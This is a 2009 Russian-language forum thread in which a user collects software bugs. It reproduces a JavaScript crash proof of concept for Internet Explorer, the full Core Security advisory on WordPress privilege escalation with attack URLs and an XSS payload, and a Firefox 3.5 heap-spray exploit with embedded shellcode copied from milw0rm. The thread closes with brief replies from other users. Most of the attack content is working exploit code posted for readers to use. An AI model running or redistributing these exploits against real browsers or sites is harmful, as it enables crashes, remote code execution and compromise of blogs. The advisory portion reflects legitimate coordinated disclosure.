ФорумСообществоНовости → Баги

Баги

  • welder

    Сообщения: 2947 Репутация: N Группа: в ухо

    Spritz 14 июля 2009 г. 22:40, спустя 4 дня 21 час 12 минут

    тут решил собирать баги всякие =)


    1. крах ие

    <html>
    <head>
    <script language=&quot;JavaScript&quot; type=&quot;Text/Javascript&quot;>
    function go()
    {
    var str =unescape(&#39;%u4141&#39;);
    var finalstr = createInlineBuffer(str, 5150000);
    var len = finalstr.length;
    document.write(len);
    addfav(finalstr);
    }
     
    /* Effient in-line creation */
    function createInlineBuffer (str, num) {
    var i = Math.ceil(Math.log(num) / Math.LN2),
    res = str;
    do {
    res += res;
    } while (0 < –i);
    return res.slice(0, str.length * num);
    }

    /* Vulnerable Function */
    function addfav(str)
      {
      if (document.all)
         {
         window.external.AddFavorite
         (&#39;http://&#39;+str,&#39;Crash&#39;)
         }
      }
    </script>
    </head>
    <body>
    <a href=&quot;javascript:go()&quot;>Add To Favorites</a>
    </body>
    </html>



    2. поднятие привелегий в WP


    —–BEGIN PGP SIGNED MESSAGE—–
    Hash: SHA1

         Core Security Technologies - CoreLabs Advisory
              http://www.coresecurity.com/corelabs/

    WordPress Privileges Unchecked in admin.php and Multiple Information
    Disclosures



    1. *Advisory Information*

    Title: WordPress Privileges Unchecked in admin.php and Multiple
    Information Disclosures
    Advisory ID: CORE-2009-0515
    Advisory URL:
    http://corelabs.coresecurity.com/index.php?action=view&amp;type=advisory&amp;name=WordPress_Privileges_Unchecked
    Date published: 2009-07-08
    Date of last update: 2009-07-08
    Vendors contacted: WordPress
    Release mode: Coordinated release


    2. *Vulnerability Information*

    Class: Local file include, Privileges unchecked, Cross site scripting
    (XSS), Information disclosure
    Remotely Exploitable: Yes
    Locally Exploitable: No
    Bugtraq ID: 35581, 35584
    CVE Name: CVE-2009-2334, CVE-2009-2335, CVE-2009-2336


    3. *Vulnerability Description*

    WordPress is a web application written in PHP that allows the easy
    installation of a flexible weblog on any computer connected to the
    Internet. WordPress 2.7 reached more than 6 million downloads during
    June 2009 [9].

    A vulnerability was found in the way that WordPress handles some URL
    requests. This results in unprivileged users viewing the content of
    plugins configuration pages, and also in some plugins modifying plugin
    options and injecting JavaScript code. Arbitrary native code may be run
    by a malicious attacker if the blog administrator runs injected
    JavasScript code that edits blog PHP code. Many WordPress-powered blogs,
    hosted outside &#39;wordpress.com&#39;, allow any person to create unprivileged
    users called subscribers. Other sensitive username information
    disclosures were found in WordPress.


    4. *Vulnerable packages*

      . WordPress 2.8 and previous
      . WordPress MU 2.7.1 and previous, used in WordPress.com


    5. *Non-vulnerable packages*

      . WordPress 2.8.1
      . WordPress MU 2.8.1, used in WordPress.com


    6. *Vendor Information, Solutions and Workarounds*

    Mitigation for the Privileges Unchecked vulnerability (suggested by Core
    Security): this vulnerability may be mitigated by controlling access to
    files inside the &#39;wp-admin&#39; folder. Access can be prohibited by using
    Apache access control mechanism (&#39;.htaccess&#39; file), see guideline for
    more information [11].


    7. *Credits*

    These vulnerabilities were discovered and researched by Fernando
    Arnaboldi and José Orlicki from Core Security Technologies. Further
    research was made by Jose Orlicki from Core Security Technologies.


    8. *Technical Description / Proof of Concept Code*


    8.1. *Introduction*

    In the last few years several security bugs were found in WordPress
    [1][2]. During 2008, the big amount of bugs reported by researchers lead
    to exploitation by blog spammers [3]. During 2009, a new round of
    attacks has appeared and security researchers are reporting new bugs or
    wrongly fixed previously-reported bugs [4][5]. A path traversal in local
    files included by &#39;admin.php&#39; has been fixed [6][7] but, in our case, we
    report that administrative privileges are still unchecked when accessing
    any PHP file inside a plugin folder.


    8.2. *Access Control Roles*

    WordPress has a privilege model where any user has an assigned role [8].
    Regarding plugins only users characterized by the role Administrator can
    activate plugins. Notice that only the blog hosting owner can add new
    plugins because these must by copied inside the host filesystem. The
    roles Editor, Author or Subscriber (the latter has the least privileges)
    cannot activate plugins, edit plugins, update plugins nor delete plugins
    installed by an Administrator. Besides that, the configuration of
    specific plugins is a grey area because there is no distinguished
    capability assigned [8].

    Also due to cross-site scripting vulnerabilities inside plugins options
    (something very common), non-administrative users reconfiguring plugins
    may inject persistent JavaScript code. Possibly arbitrary native code
    can be executed by the attacker if the blog administrator runs injected
    JavasScript code that injects PHP code. It is important to observe that
    many WordPress-powered blogs are configured to allow any blog visitor to
    create a Subscriber user without confirmation from the Administrator
    role inside the following URL, although by default the Administrator
    role must create these new users.

    /———–

    http://[some_wordpress_blog]/wp-login.php?action=register
    - ———–/

    This can be modified by the administrator in &#39;Membership/Anyone can
    register&#39;.

    /———–

    http://[some_wordpress_blog]/wp-admin/options-general.php
    - ———–/




    8.3. *Privileges Unchecked in admin.php?page= Plugin Local File Includes
    (CVE-2009-2334, BID 35581)*

    No privileges are checked on WordPress plugins configuration PHP modules
    using parameter &#39;page&#39; when we replace &#39;options-general.php&#39; with
    &#39;admin.php&#39;. The same thing happens when replacing other modules such as
    &#39;plugins.php&#39; with &#39;admin.php&#39;. Basic information disclosure is done
    this way. For example, with the following URL a user with no privileges
    can see the configuration of plugin Collapsing Archives, if installed.

    /———–

    http://[some_wordpress_blog]/wp-admin/admin.php?page=/collapsing-archives/options.txt
    - ———–/

    Instead of the following allowed URL.

    /———–

    http://[some_wordpress_blog]/wp-admin/options-general.php?page=collapsing-archives/options.txt
    - ———–/

    Another example of this information disclosure is shown on Akismet, a
    plugin shipped by default with WordPress.

    /———–

    http://[some_wordpress_blog]/wp-admin/admin.php?page=akismet/readme.txt
    - ———–/

    All plugins we have tested are vulnerable to this kind of information
    disclosure, but in many of them the PHP files accessed just crashed. On
    the other hand, for example, with capability &#39;import&#39;, privileges are
    checked inside &#39;admin.php&#39;:

    /———–

    if ( ! current_user_can(&#39;import&#39;) )
       wp_die(__(&#39;You are not allowed to import.&#39;));
    - ———–/

    More dangerous scenarios exist, all of them can be exploited by users
    with the Subscriber role, the least privileged.


    8.4. *Abuse example: XSS in plugin configuration module*

    If installed, *Related Ways To Take Action* is an example of a WordPress
    plugin that is affected by many cross-site scripting vulnerabilities
    (XSS) that can be leveraged by an attacker using the unchecked
    privileges described in this advisory to inject persistent JavaScript
    code. Possibly, arbitrary native code can be executed by the attacker if
    the blog administrator, when he/she logs in, runs injected JavasScript
    code that edits blog PHP code. The original URL for reconfiguring the
    plugin can be accessed only by the Administrator role.

    /———–

    http://[some_wordpress_blog]/wordpress/wp-admin/options-general.php?page=related-ways-to-take-action/options.php
    - ———–/

    But replacing the PHP file with the generic &#39;admin.php&#39; any blog user
    can modify this configuration.

    /———–

    http://[some_wordpress_blog]/wp-admin/admin.php?page=related-ways-to-take-action/options.php
    - ———–/

    The following JavaScript injection can be entered within field *Exclude
    actions by term* to exemplify this kind of abuse. When the administrator
    enters the same page the injected browser code will be executed and
    possibly blog PHP can be modified to run arbitrary native code.

    /———–

    \&quot;/><script>alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode(83))</script><ahref=&quot;

    - ———–/

    This is the worst scenario that we found for the vulnerability.


    8.5. *Abuse example: viewing WP Security Scanner Plugin Dashboard*

    If installed, the WordPress Security Scanner Plugin dashboard can be
    viewed similarly by any user besides the administrator using the plugin
    configuration page URL without modification. This dashboard includes
    common default blog configuration settings that are insecure and should
    be modified by the blog administrator or hosting.

    /———–

    http://[some_wordpress_blog]/wp-admin/admin.php?page=wp-security-scan/securityscan.php
    - ———–/




    8.6. *Abuse example: reconfiguring WP-IDS, a WordPress Hardening Project*

    If installed, the *Intrusion Detection System Plugin (WPIDS)*[10] can be
    reconfigured accessed with the same vulnerability.

    /———–

    http://[some_wordpress_blog]/wp-admin/index.php?page=wp-ids/ids-admin.php
    - ———–/

    This gives an attacker the possibility to disable many features of the
    plugin, for example reactivate the forgotten password feature and
    reactivate the XML-RPC blog interface. Also you can deny the weblog
    service by configuring this plugin to be overly sensitive, blocking any
    request. However the plugin cannot be totally disabled because the
    essential IDS parameters &#39;Maximum impact to ignore bad requests&#39; and
    &#39;Minimum impact to sanitize bad requests&#39; are verified on the server
    side of the blog and cannot be distorted to deactivate the sanitizing or
    blocking features of the web IDS plugin.


    8.7. *Other Information Disclosures (CVE-2009-2335, CVE-2009-2336, BID
    35584)*

    WordPress discriminates bad password from bad user logins, this reduces
    the complexity of a brute force attack on WordPress blogs login
    (CVE-2009-2335, BID 35584). The same user information disclosure happens
    when users use the forgotten mail interface to request a new password
    (CVE-2009-2336, same BID 35584). These information disclosures seem to
    be previously reported [6] but the WordPress team is refusing to modify
    them alleging *user convenience*.

    Default installation of WordPress 2.7.1 leaks the name of the user
    posting entries inside the HTML of the blog.

    /———–

     <small>June 3rd, 2009 <!– by leakedusername –></small>
    - ———–/



    Also several administrative modules give to anyone the complete path
    where the web application is hosted inside the server. This may simplify
    or enable other malicious attacks. An example follows.

    /———–

    http://[some_wordpress_blog]/wp-settings.php
    - ———–/



    /———–

    Notice: Use of undefined constant ABSPATH - assumed &#39;ABSPATH&#39; in
    [WP_LEAKED_PATH]\wp-settings.php on line 110
    Notice: Use of undefined constant ABSPATH - assumed &#39;ABSPATH&#39; in
    [WP_LEAKED_PATH]\wp-settings.php on line 112
    Warning: require(ABSPATHwp-includes/compat.php) [function.require]:
    failed to open stream:
    No such file or directory in [WP_LEAKED_PATH]\wp-settings.php on line 246
    Fatal error: require() [function.require]: Failed opening required
    &#39;ABSPATHwp-includes/compat.php&#39;
    (include_path=&#39;.;[PHP_LEAKED_PATH]\php5\pear&#39;) in
    [WP_LEAKED_PATH]\wp-settings.php on line 246

    - ———–/




    9. *Report Timeline*

    . 2009-06-04:
    Core Security Technologies notifies the WordPress team of the
    vulnerabilities ([email protected]) and offers a technical
    description encrypted or in plain-text. Advisory is planned for
    publication on June 22th.

    . 2009-06-08:
    Core notifies again the WordPress team of the vulnerability.

    . 2009-06-10:
    The WordPress team asks Core for a technical description of the
    vulnerability in plain-text.

    . 2009-06-11:
    Technical details sent to WordPress team by Core.

    . 2009-06-11:
    WordPress team notifies Core that a fix was produced and is available to
    Core for testing. WordPress team asserts that password and username
    discrimination as well as username leakage are known and will not be
    fixed because they are convenient for the users.

    . 2009-06-12:
    Core tells the WordPress team that the patch will be tested by Core as a
    courtesy as soon as possible. It also requests confirmation that
    WordPress versions 2.8 and earlier, and WordPress.com, are vulnerable to
    the flaws included in the advisory draft CORE-2009-0515.

    . 2009-06-12:
    WordPress team confirms that WordPress 2.8 and earlier plus
    WordPress.com are vulnerable to the flaws included in the advisory draft.

    . 2009-06-17:
    Core informs the WordPress team that the patch is only fixing one of the
    four proof of concept abuses included in the advisory draft. Core
    reminds the WordPress team that the advisory is scheduled to be
    published on June 22th but a new schedule can be discussed.

    . 2009-06-19:
    Core asks for a new patched version of WordPress, if available, and
    notifies the WordPress team that the publication of the advisory was
    re-scheduled to June 30th.

    . 2009-06-19:
    WordPress team confirms they have a new patch that has the potential to
    break a lot of plugins.

    . 2009-06-29:
    WordPress team asks for a delayance on advisory CORE-2009-0515
    publication until July 6th, when WordPress MU version will be patched.

    . 2009-06-29:
    Core agrees to delay publication of advisory CORE-2009-0515 until July 6th.

    . 2009-06-29:
    Core tells the WordPress team that other administrative PHP modules can
    also be rendered by non-administrative users, such as module
    &#39;admin-post.php&#39; and &#39;link-parse-opml.php&#39;.

    . 2009-07-02:
    WordPress team comments that &#39;admin.php&#39; and &#39;admin-post.php&#39; are
    intentionally open and plugins can choose to hook either privileged or
    unprivileged actions. They also comment that unprivileged access to
    &#39;link-parse-opml.php&#39; is benign but having this file open is bad form.

    . 2009-07-02:
    Core sends the WordPress team a new draft of the advisory and comments
    that there is no capability specified in Worpress documentation for
    configuring plugins. Also control of actions registered by plugins is
    not enforced. Core also notices that the privileges unchecked bug in
    &#39;admin.php?page=&#39; is fixed on WordPress 2.8.1-beta2 latest development
    release.

    . 2009-07-06:
    Core requests WordPress confirmation of the release date of WordPress
    2.8.1 and WordPress MU 2.8.

    . 2009-07-07:
    WordPress team confirms that a release candidate of WordPress 2.8.1 is
    made available to users and that the advisory may be published.

    . 2009-07-06:
    Core requests WordPress confirmation of the release date of WordPress MU
    and WordPress MU new version numbers.

    . 2009-07-07:
    WordPress team release WordPress 2.8.1 RC1 to its users.

    . 2009-07-08:
    WordPress team confirms that WordPress MU 2.8.1 will be made available
    as soon WordPress 2.8.1 is officially released. Probably July 8th or 9th.

    . 2009-07-08:
    The advisory CORE-2009-0515 is published.



    10. *References*

    [1] WordPress vulnerabilities in CVE database
    http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress
    [2] SecuriTeam List of WordPress Vulnerabilities
    http://www.securiteam.com/products/W/Wordpress.html
    [3] WordPress Vulnerability - YBO Interactive Blog
    http://www.ybo-interactive.com/blog/2008/03/30/wordpress-vulnerability/
    [4] bablooO/blyat attacks on WP 2.7.0 and 2.7.1
    http://wordpress.org/support/topic/280748
    [5] Security breach - xkcd blog
    http://blag.xkcd.com/2009/06/18/security-breach/
    [6] securityvulns.com WordPress vulnerabilities digest in English
    http://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded
    [7] CVE-2008-0196
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0196
    [8] WordPress Roles and Capabilities
    http://codex.wordpress.org/Roles_and_Capabilities
    [9] WordPress Download Counter
    http://wordpress.org/download/counter/
    [10] WordPress Intrusion Detection System Plugin
    http://php-ids.org/2008/02/21/wpids-version-012-released/
    [11] Hardening WordPress with htaccess
    http://blogsecurity.net/wordpress/article-210607


    11. *About CoreLabs*

    CoreLabs, the research center of Core Security Technologies, is charged
    with anticipating the future needs and requirements for information
    security technologies. We conduct our research in several important
    areas of computer security including system vulnerabilities, cyber
    attack planning and simulation, source code auditing, and cryptography.
    Our results include problem formalization, identification of
    vulnerabilities, novel solutions and prototypes for new technologies.
    CoreLabs regularly publishes security advisories, technical papers,
    project information and shared software tools for public use at:
    http://www.coresecurity.com/corelabs.


    12. *About Core Security Technologies*

    Core Security Technologies develops strategic solutions that help
    security-conscious organizations worldwide develop and maintain a
    proactive process for securing their networks. The company&#39;s flagship
    product, CORE IMPACT, is the most comprehensive product for performing
    enterprise security assurance testing. CORE IMPACT evaluates network,
    endpoint and end-user vulnerabilities and identifies what resources are
    exposed. It enables organizations to determine if current security
    investments are detecting and preventing attacks. Core Security
    Technologies augments its leading technology solution with world-class
    security consulting services, including penetration testing and software
    security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
    Security Technologies can be reached at 617-399-6980 or on the Web at
    http://www.coresecurity.com.


    13. *Disclaimer*

    The contents of this advisory are copyright © 2009 Core Security
    Technologies and © 2009 CoreLabs, and may be distributed freely
    provided that no fee is charged for this distribution and proper credit
    is given.


    14. *PGP/GPG Keys*

    This advisory has been signed with the GPG key of Core Security
    Technologies advisories team, which is available for download at
    http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
    —–BEGIN PGP SIGNATURE—–
    Version: GnuPG v1.4.6 (MingW32)
    Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

    iD8DBQFKVR7gyNibggitWa0RAin3AKCOrLLQ8XZnrCLot5d9xoZW6sdWwwCfTJ4N
    TPRpR0Gn0WqmF8HOeDslbA8=
    =zEDK
    —–END PGP SIGNATURE—–


  • Trej Gun

    Сообщения: 5299 Репутация: N Группа: в ухо

    Spritz 9 июля 2009 г. 23:54, спустя 1 час 14 минут 31 секунду

    да точно милворм закрылся превратим пыху в новый милворм
  • welder

    Сообщения: 2947 Репутация: N Группа: в ухо

    Spritz 9 июля 2009 г. 23:56, спустя 1 минуту 5 секунд


    да точно милворм закрылся превратим пыху в новый милворм


    там лишнего много =)
  • phpdude

    Сообщения: 26618 Репутация: N Группа: в ухо

    Spritz 10 июля 2009 г. 0:44, спустя 48 минут 5 секунд

    полезная темка. чтобы знать и не делать таких дыр
    Сапожник без сапог
  • adw0rd

    Сообщения: 22902 Репутация: N Группа: в ухо

    Spritz 10 июля 2009 г. 1:27, спустя 43 минуты 37 секунд

    поднятие привелегий в WP
    не стал читать сорцы… многобукв… А для поднятия надо иметь аккаунт в блоге? {+++61+++} &quot;крах ие&quot; - http://pyha.ru/forum/topic/122.0 так быстрее получится ))
    adw/0
  • welder

    Сообщения: 2947 Репутация: N Группа: в ухо

    Spritz 14 июля 2009 г. 22:40, спустя 4 дня 21 час 13 минут


    3. Mozilla Firefox 3.5 (Font tags) Remote Buffer Overflow Exploit

    <html>
    <head>
    <title>Firefox 3.5 Vulnerability</title>
    Firefox 3.5 Heap Spray Vulnerabilty
    </br>
    Author: SBerry aka Simon Berry-Byrne
    </br>
    Thanks to HD Moore for the insight and Metasploit for the payload
    <div id=&quot;content&quot;>
    <p>
    <FONT>
    </FONT>
    </p>
    <p>
    <FONT>Loremipsumdoloregkuw</FONT></p>
    <p>
    <FONT>Loremipsumdoloregkuwiert</FONT>
    </p>
    <p>
    <FONT>Loremikdkw </FONT>
    </p>
    </div>
    <script language=JavaScript>

    /* Calc.exe */
    var shellcode = unescape(&quot;%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800&quot; +
    &quot;%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A&quot; +
    &quot;%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350&quot; +
    &quot;%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40&quot; +
    &quot;%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000&quot; +
    &quot;%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040&quot; +
    &quot;%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD&quot; +
    &quot;%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40&quot; +
    &quot;%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18&quot; +
    &quot;%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0&quot; +
    &quot;%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B&quot; +
    &quot;%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24&quot; +
    &quot;%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9&quot; +
    &quot;%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C&quot; +
    &quot;%u652E%u6578%u9000&quot;);
    /* Heap Spray Code */
    oneblock = unescape(&quot;%u0c0c%u0c0c&quot;);
    var fullblock = oneblock;
    while (fullblock.length<0x60000)
    {
    fullblock += fullblock;
    }
    sprayContainer = new Array();
    for (i=0; i<600; i++)
    {
    sprayContainer = fullblock + shellcode;
    }
    var searchArray = new Array()

    function escapeData(data)
    {
    var i;
    var c;
    var escData=&#39;&#39;;
    for(i=0;i<data.length;i++)
    {
    c=data.charAt(i);
    if(c==&#39;&amp;&#39; || c==&#39;?&#39; || c==&#39;=&#39; || c==&#39;%&#39; || c==&#39; &#39;) c = escape©;
    escData+=c;
    }
    return escData;
    }

    function DataTranslator(){
    searchArray = new Array();
    searchArray[0] = new Array();
    searchArray[0][&quot;str&quot;] = &quot;blah&quot;;
    var newElement = document.getElementById(&quot;content&quot;)
    if (document.getElementsByTagName) {
    var i=0;
    pTags = newElement.getElementsByTagName(&quot;p&quot;)
    if (pTags.length > 0)
    while (i<pTags.length)
    {
    oTags = pTags.getElementsByTagName(&quot;font&quot;)
    searchArray[i+1] = new Array()
    if (oTags[0])
    {
    searchArray[i+1][&quot;str&quot;] = oTags[0].innerHTML;
    }
    i++
    }
    }
    }

    function GenerateHTML()
    {
    var html = &quot;&quot;;
    for (i=1;i<searchArray.length;i++)
    {
    html += escapeData(searchArray[&quot;str&quot;])
    }
    }
    DataTranslator();
    GenerateHTML()
    </script>
    </body>
    </html>
    <html><body></body></html>

    # milw0rm.com [2009-07-13]


    плакаю =(
  • Sinkler

    Сообщения: 9658 Репутация: N Группа: в ухо

    Spritz 15 июля 2009 г. 3:08, спустя 4 часа 27 минут 29 секунд

    (

Пожалуйста, авторизуйтесь, чтобы написать комментарий!